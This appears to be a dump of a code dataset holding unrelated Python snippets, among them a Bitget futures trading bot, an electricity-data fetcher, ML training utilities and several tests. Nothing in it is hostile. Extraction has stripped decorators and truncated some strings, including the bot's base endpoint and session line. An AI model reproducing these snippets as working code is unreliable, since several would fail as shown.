code stringlengths 281 23.7M |
|---|
def write_json(path: FilePath, data: JSONInput, indent: int=2) -> None:
json_data = json_dumps(data, indent=indent)
if (path == '-'):
print(json_data)
else:
file_path = force_path(path, require_exists=False)
with file_path.open('w', encoding='utf8') as f:
f.write(json_data) |
def fetch_production(zone_key: ZoneKey=ZoneKey('CA-QC'), session: (Session | None)=None, target_datetime: (datetime | None)=None, logger: Logger=getLogger(__name__)) -> list[dict[(str, Any)]]:
data = _fetch_quebec_production(session)
production = ProductionBreakdownList(logger)
now = datetime.now(tz=TIMEZONE)
for elem in data:
values = elem['valeurs']
if isinstance(elem['date'], str):
timestamp = datetime.fromisoformat(elem['date']).replace(tzinfo=TIMEZONE)
if ((timestamp <= now) and (values.get('total', 0) > 0)):
production.append(zoneKey=zone_key, datetime=timestamp, production=ProductionMix(biomass=values.get('autres', 0), hydro=values.get('hydraulique', 0), gas=values.get('thermique', 0), solar=values.get('solaire', 0), wind=values.get('eolien', 0)), source=SOURCE)
return production.to_list() |
class OptionPlotoptionsItemEvents(Options):
def afterAnimate(self):
return self._config_get(None)
def afterAnimate(self, value: Any):
self._config(value, js_type=False)
def checkboxClick(self):
return self._config_get(None)
def checkboxClick(self, value: Any):
self._config(value, js_type=False)
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def hide(self):
return self._config_get(None)
def hide(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
def mouseOver(self, value: Any):
self._config(value, js_type=False)
def show(self):
return self._config_get(None)
def show(self, value: Any):
self._config(value, js_type=False) |
()
('--local-dir', default='./tmp/diffusers-pipeline/stabilityai/stable-diffusion-v2', help='the local diffusers pipeline directory')
('--width', default=512, help='Width of generated image')
('--height', default=512, help='Height of generated image')
('--batch', default=1, help='Batch size of generated image')
('--prompt', default='A vision of paradise, Unreal Engine', help='prompt')
('--negative_prompt', default='', help='prompt')
('--benchmark', type=bool, default=False, help='run stable diffusion e2e benchmark')
def run(local_dir, width, height, batch, prompt, negative_prompt, benchmark):
pipe = StableDiffusionAITPipeline.from_pretrained(local_dir, scheduler=EulerDiscreteScheduler.from_pretrained(local_dir, subfolder='scheduler'), revision='fp16', torch_dtype=torch.float16).to('cuda')
prompt = ([prompt] * batch)
with torch.autocast('cuda'):
images = pipe(prompt, height, width).images
if benchmark:
t = benchmark_torch_function(10, pipe, prompt, height=height, width=width)
print(f'sd e2e: width={width}, height={height}, batchsize={batch}, latency={t} ms')
for (i, image) in enumerate(images):
image.save(f'example_ait_{i}.png') |
def test_slash_no_dbl_prepare(casper, concise_casper, funded_account, validation_key, deposit_amount, induct_validator, mk_vote, fake_hash):
validator_index = induct_validator(funded_account, validation_key, deposit_amount)
assert (concise_casper.total_curdyn_deposits_in_wei() == deposit_amount)
vote_1 = mk_vote(validator_index, concise_casper.recommended_target_hash(), concise_casper.current_epoch(), concise_casper.recommended_source_epoch(), validation_key)
vote_2 = mk_vote(validator_index, fake_hash, concise_casper.current_epoch(), concise_casper.recommended_source_epoch(), validation_key)
next_dynasty = (concise_casper.dynasty() + 1)
assert (concise_casper.dynasty_wei_delta((concise_casper.dynasty() + 1)) == 0)
assert concise_casper.slashable(vote_1, vote_2)
casper.functions.slash(vote_1, vote_2).transact()
assert (concise_casper.total_slashed(concise_casper.current_epoch()) == deposit_amount)
assert (concise_casper.dynasty_wei_delta(next_dynasty) == ((- deposit_amount) / concise_casper.deposit_scale_factor(concise_casper.current_epoch())))
assert concise_casper.validators__is_slashed(validator_index)
assert (concise_casper.validators__end_dynasty(validator_index) == next_dynasty)
assert (concise_casper.validators__total_deposits_at_logout(validator_index) == deposit_amount) |
def test_request_form_context_manager(test_client_factory):
async def app(scope, receive, send):
request = Request(scope, receive)
async with request.form() as form:
response = JSONResponse({'form': dict(form)})
(await response(scope, receive, send))
client = test_client_factory(app)
response = client.post('/', data={'abc': '123 '})
assert (response.json() == {'form': {'abc': '123 '}}) |
def valid(valid_loader, model, logger):
model.eval()
losses = AverageMeter()
for data in tqdm(valid_loader):
(padded_input, padded_target, input_lengths) = data
padded_input = padded_input.to(device)
padded_target = padded_target.to(device)
input_lengths = input_lengths.to(device)
with torch.no_grad():
(pred, gold) = model(padded_input, input_lengths, padded_target)
(loss, n_correct) = cal_performance(pred, gold, smoothing=args.label_smoothing)
losses.update(loss.item())
logger.info('\nValidation Loss {loss.val:.5f} ({loss.avg:.5f})\n'.format(loss=losses))
return losses.avg |
class BuilderModule():
name: str
module: t.Dict[(str, t.Any)]
module_path: str
parent: t.Optional[BuilderModule] = None
sources: t.List[BuilderSource] = dataclasses.field(default_factory=(lambda : []))
def from_manifest(cls: t.Type[_BM], module_path: str, module: t.Dict, parent: t.Optional[BuilderModule]=None) -> _BM:
return cls(name=module['name'], module=module, module_path=module_path, parent=parent)
def __str__(self):
return self.name |
class padded_dense_to_jagged(Operator):
def __init__(self, total_length: IntVar):
if isinstance(total_length, JaggedIntVar):
total_length = total_length.total_length()
if (type(total_length) != IntVar):
raise TypeError(f'total_length must be IntVar, but got {type(total_length).__name__}.')
super().__init__()
self._attrs['op'] = 'padded_dense_to_jagged'
self._attrs['total_length'] = total_length
def _infer_shape(self, x: Tensor, offsets_list: List[Tensor]) -> List[IntVar]:
inner_shape = x.shape()[(1 + len(offsets_list)):]
return ([self._attrs['total_length']] + inner_shape)
def _get_op_attributes(self):
return {'total_length': self._attrs['total_length']}
def _args_for_pseudo_code(self):
return [f"total_length={self._attrs['total_length']}"]
def __call__(self, x: Tensor, offsets_list: List[Tensor]) -> Tensor:
x_shape = x.shape()
if (not offsets_list):
raise ValueError('At least one offsets Tensor must be specified.')
if (len(x_shape) < (len(offsets_list) + 2)):
raise ValueError(f'The input dense Tensor x must have at least len(offsets_list) + 2 dimensions: one batch dimension, as many sequence dimensions as len(offsets_list), and at least one inner dimension, but len(offsets_list)={len(offsets_list)!r}, x_shape={x_shape!r}.')
if (type(x_shape[0]) != IntVar):
raise TypeError(f'x.shape()[0] must be IntVar, but got {type(x_shape[0]).__name__}.')
self._attrs['inputs'] = [x, *offsets_list]
self._set_depth()
output_shape = self._infer_shape(x, offsets_list)
source = Tensor(output_shape, src_ops={self}, dtype=x._attrs['dtype'])
self._attrs['outputs'] = [source]
jagged_output = make_jagged(batch_dim=x_shape[0], jagged_dims=[JaggedDim(min_value=0, max_value=dim) for dim in x_shape[1:(1 + len(offsets_list))]])(source=source, offsets_list=offsets_list)
self._attrs['jagged_int_var'] = jagged_output._attrs['shape'][0]
return jagged_output
def gen_function(self) -> str:
target = Target.current()
func = registry.get(f"{target.name()}.{self._attrs['op']}.gen_function")
return func(self._attrs) |
class GradientClipping(NetModifier):
L1_NORM = 'l1_norm'
L2_NORM = 'l2_norm'
BY_NORM = 'by_norm'
BY_VALUE = 'by_value'
GRAD_CLIP_METHODS = [BY_NORM, BY_VALUE]
CLIP_GRADIENT_NORM_TYPES = [L2_NORM, L1_NORM]
def __init__(self, grad_clip_method, clip_norm_type='l2_norm', clip_threshold=0.1, use_parameter_norm=False, compute_norm_ratio=False, clip_max=1, clip_min=(- 1), blobs_to_include=None, blobs_to_exclude=None):
assert (grad_clip_method in self.GRAD_CLIP_METHODS), 'This method of clipping, {}, has not been implemented.'.format(clip_norm_type)
if (clip_norm_type is not None):
assert (clip_norm_type in self.CLIP_GRADIENT_NORM_TYPES), 'This method of clipping, {}, has not been implemented.'.format(clip_norm_type)
self.grad_clip_method = grad_clip_method
self.clip_norm_type = clip_norm_type
self.clip_threshold = float(clip_threshold)
self.use_parameter_norm = use_parameter_norm
self.compute_norm_ratio = compute_norm_ratio
self.clip_max = float(clip_max)
self.clip_min = float(clip_min)
self.blobs_to_include = blobs_to_include
self.blobs_to_exclude = blobs_to_exclude
def modify_net(self, net, init_net=None, grad_map=None, blob_to_device=None, modify_output_record=False):
assert (grad_map is not None)
final_param_map = {}
if (self.blobs_to_include is None):
final_param_map = grad_map
else:
for blob in self.blobs_to_include:
param = core.BlobReference(blob)
if (not net.BlobIsDefined(param)):
raise Exception('param {0} is not defined in net {1}'.format(param, net.Name()))
final_param_map[param] = grad_map[param]
if (self.blobs_to_exclude is not None):
for blob in self.blobs_to_exclude:
final_param_map.pop(blob, None)
for (param, grad) in final_param_map.items():
if isinstance(grad, core.GradientSlice):
continue
if (self.grad_clip_method == self.BY_NORM):
if (self.clip_norm_type == self.L2_NORM):
p = 2
elif (self.clip_norm_type == self.L1_NORM):
p = 1
grad_norm = net.LpNorm([grad], net.NextScopedBlob(prefix=(str(grad) + '_l{}_norm'.format(p))), p=p)
if (p == 2):
grad_norm = net.Pow([grad_norm], exponent=0.5)
op_inputs = [grad, grad_norm]
if self.use_parameter_norm:
param_norm = net.LpNorm([param], net.NextScopedBlob(prefix=(str(param) + '_l{}_norm'.format(p))), p=p)
if (p == 2):
param_norm = net.Pow([param_norm], exponent=0.5)
op_inputs.append(param_norm)
if self.compute_norm_ratio:
net.Div([grad_norm, param_norm], [net.NextScopedBlob(prefix=(str(param) + '_norm_ratio'))])
net.ClipTensorByScaling(op_inputs, [grad], threshold=self.clip_threshold)
elif (self.grad_clip_method == self.BY_VALUE):
net.Clip([grad], [grad], max=self.clip_max, min=self.clip_min) |
class BitgetBot(Bot):
def __init__(self, config: dict):
self.is_logged_into_user_stream = False
self.exchange = 'bitget'
self.max_n_orders_per_batch = 50
self.max_n_cancellations_per_batch = 60
super().__init__(config)
self.base_endpoint = '
self.endpoints = {'exchange_info': '/api/mix/v1/market/contracts', 'funds_transfer': '/api/spot/v1/wallet/transfer-v2', 'position': '/api/mix/v1/position/singlePosition', 'balance': '/api/mix/v1/account/accounts', 'ticker': '/api/mix/v1/market/ticker', 'tickers': '/api/mix/v1/market/tickers', 'open_orders': '/api/mix/v1/order/current', 'open_orders_all': '/api/mix/v1/order/marginCoinCurrent', 'create_order': '/api/mix/v1/order/placeOrder', 'batch_orders': '/api/mix/v1/order/batch-orders', 'batch_cancel_orders': '/api/mix/v1/order/cancel-batch-orders', 'cancel_order': '/api/mix/v1/order/cancel-order', 'ticks': '/api/mix/v1/market/fills', 'fills': '/api/mix/v1/order/fills', 'fills_detailed': '/api/mix/v1/order/history', 'ohlcvs': '/api/mix/v1/market/candles', 'websocket_market': 'wss://ws.bitget.com/mix/v1/stream', 'websocket_user': 'wss://ws.bitget.com/mix/v1/stream', 'set_margin_mode': '/api/mix/v1/account/setMarginMode', 'set_leverage': '/api/mix/v1/account/setLeverage'}
self.order_side_map = {'buy': {'long': 'open_long', 'short': 'close_short'}, 'sell': {'long': 'close_long', 'short': 'open_short'}}
self.fill_side_map = {'burst_close_long': 'sell', 'burst_close_short': 'buy', 'close_long': 'sell', 'open_long': 'buy', 'close_short': 'buy', 'open_short': 'sell'}
self.session = aio
def init_market_type(self):
self.symbol_stripped = self.symbol
if self.symbol.endswith('USDT'):
print('linear perpetual')
self.symbol += '_UMCBL'
self.market_type += '_linear_perpetual'
self.product_type = 'umcbl'
self.inverse = self.config['inverse'] = False
self.min_cost = self.config['min_cost'] = 5.5
elif self.symbol.endswith('USD'):
print('inverse perpetual')
self.symbol += '_DMCBL'
self.market_type += '_inverse_perpetual'
self.product_type = 'dmcbl'
self.inverse = self.config['inverse'] = False
self.min_cost = self.config['min_cost'] = 6.0
else:
raise NotImplementedError('not yet implemented')
async def _init(self):
self.init_market_type()
info = (await self.fetch_exchange_info())
for e in info['data']:
if (e['symbol'] == self.symbol):
break
else:
raise Exception(f'symbol missing {self.symbol}')
self.coin = e['baseCoin']
self.quote = e['quoteCoin']
self.price_step = self.config['price_step'] = round_(((10 ** (- int(e['pricePlace']))) * int(e['priceEndStep'])), 1e-12)
self.price_rounding = int(e['pricePlace'])
self.qty_step = self.config['qty_step'] = float(e['sizeMultiplier'])
self.min_qty = self.config['min_qty'] = float(e['minTradeNum'])
self.margin_coin = (self.coin if (self.product_type == 'dmcbl') else self.quote)
(await super()._init())
(await self.init_order_book())
(await self.update_position())
async def fetch_exchange_info(self):
info = (await self.public_get(self.endpoints['exchange_info'], params={'productType': self.product_type}))
return info
async def fetch_ticker(self, symbol=None):
ticker = (await self.public_get(self.endpoints['ticker'], params={'symbol': (self.symbol if (symbol is None) else symbol)}))
return {'symbol': ticker['data']['symbol'], 'bid': float(ticker['data']['bestBid']), 'ask': float(ticker['data']['bestAsk']), 'last': float(ticker['data']['last'])}
async def fetch_tickers(self, product_type=None):
tickers = (await self.public_get(self.endpoints['tickers'], params={'productType': (self.product_type if (product_type is None) else product_type)}))
return [{'symbol': ticker['symbol'], 'bid': (0.0 if (ticker['bestBid'] is None) else float(ticker['bestBid'])), 'ask': (0.0 if (ticker['bestAsk'] is None) else float(ticker['bestAsk'])), 'last': (0.0 if (ticker['last'] is None) else float(ticker['last']))} for ticker in tickers['data']]
async def init_order_book(self):
ticker = None
try:
ticker = (await self.fetch_ticker())
self.ob = [ticker['bid'], ticker['ask']]
self.price = ticker['last']
return True
except Exception as e:
logging.error(f'error updating order book {e}')
print_async_exception(ticker)
return False
async def fetch_open_orders(self) -> [dict]:
fetched = (await self.private_get(self.endpoints['open_orders'], {'symbol': self.symbol}))
return [{'order_id': elm['orderId'], 'custom_id': elm['clientOid'], 'symbol': elm['symbol'], 'price': float(elm['price']), 'qty': float(elm['size']), 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched['data']]
async def fetch_open_orders_all(self) -> [dict]:
fetched = (await self.private_get(self.endpoints['open_orders_all'], {'productType': self.product_type}))
return [{'order_id': elm['orderId'], 'custom_id': elm['clientOid'], 'symbol': elm['symbol'], 'price': float(elm['price']), 'qty': float(elm['size']), 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched['data']]
async def public_get(self, url: str, params: dict={}) -> dict:
result = None
response_ = None
try:
async with self.session.get((self.base_endpoint + url), params=params) as response:
response_ = response
result = (await response.text())
return json.loads(result)
except Exception as e:
logging.error(f'error with json decoding {url} {params} {e}')
traceback.print_exc()
print_async_exception(result)
print_async_exception(response_)
raise Exception
async def private_(self, type_: str, base_endpoint: str, url: str, params: dict={}, json_: bool=False) -> dict:
def stringify(x):
if (type(x) == bool):
return ('true' if x else 'false')
elif (type(x) == float):
return format_float(x)
elif (type(x) == int):
return str(x)
elif (type(x) == list):
return [stringify(y) for y in x]
elif (type(x) == dict):
return {k: stringify(v) for (k, v) in x.items()}
else:
return x
timestamp = int((time() * 1000))
params = {k: stringify(v) for (k, v) in params.items()}
if (type_ == 'get'):
url = ((url + '?') + urlencode(sort_dict_keys(params)))
to_sign = ((str(timestamp) + type_.upper()) + url)
elif (type_ == 'post'):
to_sign = (((str(timestamp) + type_.upper()) + url) + json.dumps(params))
signature = base64.b64encode(hmac.new(self.secret.encode('utf-8'), to_sign.encode('utf-8'), digestmod='sha256').digest()).decode('utf-8')
header = {'Content-Type': 'application/json', 'locale': 'en-US', 'ACCESS-KEY': self.key, 'ACCESS-SIGN': signature, 'ACCESS-TIMESTAMP': str(timestamp), 'ACCESS-PASSPHRASE': self.passphrase}
if (type_ == 'post'):
async with getattr(self.session, type_)((base_endpoint + url), headers=header, data=json.dumps(params)) as response:
result = (await response.text())
elif (type_ == 'get'):
async with getattr(self.session, type_)((base_endpoint + url), headers=header) as response:
result = (await response.text())
return json.loads(result)
async def private_get(self, url: str, params: dict={}, base_endpoint: str=None) -> dict:
return (await self.private_(type_='get', base_endpoint=(self.base_endpoint if (base_endpoint is None) else base_endpoint), url=url, params=params))
async def private_post(self, url: str, params: dict={}, base_endpoint: str=None) -> dict:
return (await self.private_(type_='post', base_endpoint=(self.base_endpoint if (base_endpoint is None) else base_endpoint), url=url, params=params))
async def transfer_from_derivatives_to_spot(self, coin: str, amount: float):
params = {'coin': 'USDT', 'amount': str(amount), 'from_account_type': 'mix_usdt', 'to_account_type': 'spot'}
return (await self.private_('post', self.base_endpoint, self.endpoints['funds_transfer'], params=params, json_=True))
async def get_server_time(self):
now = (await self.public_get('/api/spot/v1/public/time'))
return float(now['data'])
async def fetch_position(self) -> dict:
position = {'long': {'size': 0.0, 'price': 0.0, 'liquidation_price': 0.0}, 'short': {'size': 0.0, 'price': 0.0, 'liquidation_price': 0.0}, 'wallet_balance': 0.0}
(fetched_pos, fetched_balance) = (None, None)
try:
(fetched_pos, fetched_balance) = (await asyncio.gather(self.private_get(self.endpoints['position'], {'symbol': self.symbol, 'marginCoin': self.margin_coin}), self.private_get(self.endpoints['balance'], {'productType': self.product_type})))
for elm in fetched_pos['data']:
if (elm['holdSide'] == 'long'):
position['long'] = {'size': round_(float(elm['total']), self.qty_step), 'price': (0.0 if (elm['averageOpenPrice'] is None) else float(elm['averageOpenPrice'])), 'liquidation_price': (0.0 if (elm['liquidationPrice'] is None) else float(elm['liquidationPrice']))}
elif (elm['holdSide'] == 'short'):
position['short'] = {'size': (- abs(round_(float(elm['total']), self.qty_step))), 'price': (0.0 if (elm['averageOpenPrice'] is None) else float(elm['averageOpenPrice'])), 'liquidation_price': (0.0 if (elm['liquidationPrice'] is None) else float(elm['liquidationPrice']))}
for elm in fetched_balance['data']:
if (elm['marginCoin'] == self.margin_coin):
if (self.product_type == 'dmcbl'):
all_emas = (list(self.emas_long) + list(self.emas_short))
if any(((ema == 0.0) for ema in all_emas)):
all_emas = self.ob
position['wallet_balance'] = (float(elm['available']) * np.mean(all_emas))
else:
position['wallet_balance'] = float(elm['available'])
break
return position
except Exception as e:
logging.error(f'error fetching pos or balance {e}')
print_async_exception(fetched_pos)
print_async_exception(fetched_balance)
traceback.print_exc()
return None
async def execute_orders(self, orders: [dict]) -> [dict]:
if (len(orders) == 0):
return []
if (len(orders) == 1):
return [(await self.execute_order(orders[0]))]
return (await self.execute_batch_orders(orders))
async def execute_order(self, order: dict) -> dict:
o = None
try:
params = {'symbol': self.symbol, 'marginCoin': self.margin_coin, 'size': str(order['qty']), 'side': self.order_side_map[order['side']][order['position_side']], 'orderType': order['type'], 'presetTakeProfitPrice': '', 'presetStopLossPrice': ''}
if (params['orderType'] == 'limit'):
params['timeInForceValue'] = 'post_only'
params['price'] = str(order['price'])
else:
params['timeInForceValue'] = 'normal'
random_str = f'{str(int((time() * 1000)))[(- 6):]}_{int((np.random.random() * 10000))}'
custom_id = (order['custom_id'] if ('custom_id' in order) else '0')
params['clientOid'] = f'{self.broker_code}#{custom_id}_{random_str}'
o = (await self.private_post(self.endpoints['create_order'], params))
if o['data']:
return {'symbol': self.symbol, 'side': order['side'], 'order_id': o['data']['orderId'], 'position_side': order['position_side'], 'type': order['type'], 'qty': order['qty'], 'price': order['price']}
else:
return (o, order)
except Exception as e:
print(f'error executing order {order} {e}')
print_async_exception(o)
traceback.print_exc()
return {}
async def execute_batch_orders(self, orders: [dict]) -> [dict]:
executed = None
try:
to_execute = []
orders_with_custom_ids = []
for order in orders:
params = {'size': str(order['qty']), 'side': self.order_side_map[order['side']][order['position_side']], 'orderType': order['type'], 'presetTakeProfitPrice': '', 'presetStopLossPrice': ''}
if (params['orderType'] == 'limit'):
params['timeInForceValue'] = 'post_only'
params['price'] = str(order['price'])
else:
params['timeInForceValue'] = 'normal'
random_str = f'{str(int((time() * 1000)))[(- 6):]}_{int((np.random.random() * 10000))}'
custom_id = (order['custom_id'] if ('custom_id' in order) else '0')
params['clientOid'] = order['custom_id'] = f'{self.broker_code}#{custom_id}_{random_str}'
orders_with_custom_ids.append({**order, **{'symbol': self.symbol}})
to_execute.append(params)
executed = (await self.private_post(self.endpoints['batch_orders'], {'symbol': self.symbol, 'marginCoin': self.margin_coin, 'orderDataList': to_execute}))
formatted = []
for ex in executed['data']['orderInfo']:
to_add = {'order_id': ex['orderId'], 'custom_id': ex['clientOid']}
for elm in orders_with_custom_ids:
if (elm['custom_id'] == ex['clientOid']):
to_add.update(elm)
formatted.append(to_add)
break
return formatted
except Exception as e:
print(f'error executing order {executed} {e}')
print_async_exception(executed)
traceback.print_exc()
return []
async def execute_cancellations(self, orders: [dict]) -> [dict]:
if (not orders):
return []
cancellations = []
symbol = (orders[0]['symbol'] if ('symbol' in orders[0]) else self.symbol)
try:
cancellations = (await self.private_post(self.endpoints['batch_cancel_orders'], {'symbol': symbol, 'marginCoin': self.margin_coin, 'orderIds': [order['order_id'] for order in orders]}))
formatted = []
for oid in cancellations['data']['order_ids']:
to_add = {'order_id': oid}
for order in orders:
if (order['order_id'] == oid):
to_add.update(order)
formatted.append(to_add)
break
return formatted
except Exception as e:
logging.error(f'error cancelling orders {orders} {e}')
print_async_exception(cancellations)
traceback.print_exc()
return []
async def fetch_account(self):
raise NotImplementedError('not implemented')
try:
resp = (await self.private_get(self.endpoints['spot_balance'], base_endpoint=self.spot_base_endpoint))
return resp['result']
except Exception as e:
print('error fetching account: ', e)
return {'balances': []}
async def fetch_ticks(self, from_id: int=None, do_print: bool=True):
params = {'symbol': self.symbol, 'limit': 100}
try:
ticks = (await self.public_get(self.endpoints['ticks'], params))
except Exception as e:
print('error fetching ticks', e)
return []
try:
trades = [{'trade_id': int(tick['tradeId']), 'price': float(tick['price']), 'qty': float(tick['size']), 'timestamp': float(tick['timestamp']), 'is_buyer_maker': (tick['side'] == 'sell')} for tick in ticks['data']]
if do_print:
print_(['fetched trades', self.symbol, trades[0]['trade_id'], ts_to_date((float(trades[0]['timestamp']) / 1000))])
except:
trades = []
if do_print:
print_(['fetched no new trades', self.symbol])
return trades
async def fetch_ohlcvs(self, symbol: str=None, start_time: int=None, interval='1m'):
interval_map = {'1m': ('1m', 60), '3m': ('3m', (60 * 3)), '5m': ('5m', (60 * 5)), '15m': ('15m', (60 * 15)), '30m': ('30m', (60 * 30)), '1h': ('1H', (60 * 60)), '2h': ('2H', ((60 * 60) * 2)), '4h': ('4H', ((60 * 60) * 4)), '6h': ('6H', ((60 * 60) * 4)), '12h': ('12H', ((60 * 60) * 12)), '1d': ('1D', ((60 * 60) * 24)), '3d': ('3D', (((60 * 60) * 24) * 3)), '1w': ('1W', (((60 * 60) * 24) * 7)), '1M': ('1M', (((60 * 60) * 24) * 30))}
assert (interval in interval_map), f'unsupported interval {interval}'
params = {'symbol': (self.symbol if (symbol is None) else symbol), 'granularity': interval_map[interval][0]}
limit = 100
seconds = float(interval_map[interval][1])
if (start_time is None):
server_time = (await self.get_server_time())
params['startTime'] = int((round(float(server_time)) - ((1000 * seconds) * limit)))
else:
params['startTime'] = int(round(start_time))
params['endTime'] = int(round((params['startTime'] + ((1000 * seconds) * limit))))
fetched = (await self.public_get(self.endpoints['ohlcvs'], params))
return [{'timestamp': float(e[0]), 'open': float(e[1]), 'high': float(e[2]), 'low': float(e[3]), 'close': float(e[4]), 'volume': float(e[5])} for e in fetched]
async def get_all_income(self, symbol: str=None, start_time: int=None, end_time: int=None):
if (end_time is None):
end_time = (utc_ms() + (((1000 * 60) * 60) * 6))
if (start_time is None):
start_time = (utc_ms() - ((((1000 * 60) * 60) * 24) * 3))
all_fills = []
all_fills_ids = set()
while True:
fills = (await self.fetch_fills(symbol=symbol, start_time=start_time, end_time=end_time))
if (not fills):
break
new_fills = []
for elm in fills:
if (elm['id'] not in all_fills_ids):
new_fills.append(elm)
all_fills_ids.add(elm['id'])
if (not new_fills):
break
end_time = fills[(- 1)]['timestamp']
all_fills += new_fills
income = [{'symbol': elm['symbol'], 'transaction_id': elm['id'], 'income': elm['realized_pnl'], 'token': self.quote, 'timestamp': elm['timestamp']} for elm in all_fills]
return sorted([elm for elm in income if (elm['income'] != 0.0)], key=(lambda x: x['timestamp']))
async def fetch_income(self, symbol: str=None, start_time: int=None, end_time: int=None):
raise NotImplementedError
async def fetch_latest_fills_new(self):
cached = None
fname = make_get_filepath(f'logs/fills_cached_bitget/{self.user}_{self.symbol}.json')
try:
if os.path.exists(fname):
cached = json.load(open(fname))
else:
cached = []
except Exception as e:
logging.error('error loading fills cache', e)
traceback.print_exc()
cached = []
fetched = None
lookback_since = int((utc_ms() - max(flatten([v for (k, v) in self.xk.items() if ('delay_between_fills_ms' in k)]))))
try:
params = {'symbol': self.symbol, 'startTime': lookback_since, 'endTime': int((utc_ms() + (((1000 * 60) * 60) * 2))), 'pageSize': 100}
fetched = (await self.private_get(self.endpoints['fills_detailed'], params))
if ((fetched['code'] == '00000') and (fetched['msg'] == 'success') and (fetched['data']['orderList'] is None)):
return []
fetched = fetched['data']['orderList']
k = 0
while (fetched and (float(fetched[(- 1)]['cTime']) > (utc_ms() - ((((1000 * 60) * 60) * 24) * 3)))):
k += 1
if (k > 5):
break
params['endTime'] = int(float(fetched[(- 1)]['cTime']))
fetched2 = (await self.private_get(self.endpoints['fills_detailed'], params))['data']['orderList']
if (fetched2[(- 1)] == fetched[(- 1)]):
break
fetched_d = {x['orderId']: x for x in (fetched + fetched2)}
fetched = sorted(fetched_d.values(), key=(lambda x: float(x['cTime'])), reverse=True)
fills = [{'order_id': elm['orderId'], 'symbol': elm['symbol'], 'status': elm['state'], 'custom_id': elm['clientOid'], 'price': float(elm['priceAvg']), 'qty': float(elm['filledQty']), 'original_qty': float(elm['size']), 'type': elm['orderType'], 'reduce_only': elm['reduceOnly'], 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched if ('filled' in elm['state'])]
except Exception as e:
print('error fetching latest fills', e)
print_async_exception(fetched)
traceback.print_exc()
return []
return fills
async def fetch_latest_fills(self):
fetched = None
try:
params = {'symbol': self.symbol, 'startTime': int((utc_ms() - ((((1000 * 60) * 60) * 24) * 6))), 'endTime': int((utc_ms() + (((1000 * 60) * 60) * 2))), 'pageSize': 100}
fetched = (await self.private_get(self.endpoints['fills_detailed'], params))
if ((fetched['code'] == '00000') and (fetched['msg'] == 'success') and (fetched['data']['orderList'] is None)):
return []
fetched = fetched['data']['orderList']
k = 0
while (fetched and (float(fetched[(- 1)]['cTime']) > (utc_ms() - ((((1000 * 60) * 60) * 24) * 3)))):
k += 1
if (k > 5):
break
params['endTime'] = int(float(fetched[(- 1)]['cTime']))
fetched2 = (await self.private_get(self.endpoints['fills_detailed'], params))['data']['orderList']
if (fetched2[(- 1)] == fetched[(- 1)]):
break
fetched_d = {x['orderId']: x for x in (fetched + fetched2)}
fetched = sorted(fetched_d.values(), key=(lambda x: float(x['cTime'])), reverse=True)
fills = [{'order_id': elm['orderId'], 'symbol': elm['symbol'], 'status': elm['state'], 'custom_id': elm['clientOid'], 'price': float(elm['priceAvg']), 'qty': float(elm['filledQty']), 'original_qty': float(elm['size']), 'type': elm['orderType'], 'reduce_only': elm['reduceOnly'], 'side': ('buy' if (elm['side'] in ['close_short', 'open_long']) else 'sell'), 'position_side': elm['posSide'], 'timestamp': float(elm['cTime'])} for elm in fetched if ('filled' in elm['state'])]
except Exception as e:
print('error fetching latest fills', e)
print_async_exception(fetched)
traceback.print_exc()
return []
return fills
async def fetch_fills(self, symbol=None, limit: int=100, from_id: int=None, start_time: int=None, end_time: int=None):
params = {'symbol': (self.symbol if (symbol is None) else symbol)}
if (from_id is not None):
params['lastEndId'] = max(0, (from_id - 1))
if (start_time is None):
server_time = (await self.get_server_time())
params['startTime'] = int(round((server_time - (((1000 * 60) * 60) * 24))))
else:
params['startTime'] = int(round(start_time))
if (end_time is None):
params['endTime'] = int((round((time() + ((60 * 60) * 24))) * 1000))
else:
params['endTime'] = int(round((end_time + 1)))
try:
fetched = (await self.private_get(self.endpoints['fills'], params))
fills = [{'symbol': x['symbol'], 'id': int(x['tradeId']), 'order_id': int(x['orderId']), 'side': self.fill_side_map[x['side']], 'price': float(x['price']), 'qty': float(x['sizeQty']), 'realized_pnl': float(x['profit']), 'cost': float(x['fillAmount']), 'fee_paid': float(x['fee']), 'fee_token': self.quote, 'timestamp': int(x['cTime']), 'position_side': ('long' if ('long' in x['side']) else 'short'), 'is_maker': 'unknown'} for x in fetched['data']]
except Exception as e:
print('error fetching fills', e)
traceback.print_exc()
return []
return fills
async def init_exchange_config(self):
try:
res = (await self.private_post(self.endpoints['set_margin_mode'], params={'symbol': self.symbol, 'marginCoin': self.margin_coin, 'marginMode': 'crossed'}))
print(res)
res = (await self.private_post(self.endpoints['set_leverage'], params={'symbol': self.symbol, 'marginCoin': self.margin_coin, 'leverage': self.leverage}))
print(res)
except Exception as e:
print('error initiating exchange config', e)
def standardize_market_stream_event(self, data: dict) -> [dict]:
if (('action' not in data) or (data['action'] != 'update')):
return []
ticks = []
for e in data['data']:
try:
ticks.append({'timestamp': int(e[0]), 'price': float(e[1]), 'qty': float(e[2]), 'is_buyer_maker': (e[3] == 'sell')})
except Exception as ex:
print('error in websocket tick', e, ex)
return ticks
async def beat_heart_user_stream(self) -> None:
while True:
(await asyncio.sleep(27))
try:
(await self.ws_user.send(json.dumps({'op': 'ping'})))
except Exception as e:
traceback.print_exc()
print_(['error sending heartbeat user', e])
async def beat_heart_market_stream(self) -> None:
while True:
(await asyncio.sleep(27))
try:
(await self.ws_market.send(json.dumps({'op': 'ping'})))
except Exception as e:
traceback.print_exc()
print_(['error sending heartbeat market', e])
async def subscribe_to_market_stream(self, ws):
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'instType': 'mc', 'channel': 'trade', 'instId': self.symbol_stripped}]})))
async def subscribe_to_user_streams(self, ws):
res = (await ws.send(json.dumps({'op': 'subscribe', 'args': [{'instType': self.product_type.upper(), 'channel': 'account', 'instId': 'default'}]})))
print(res)
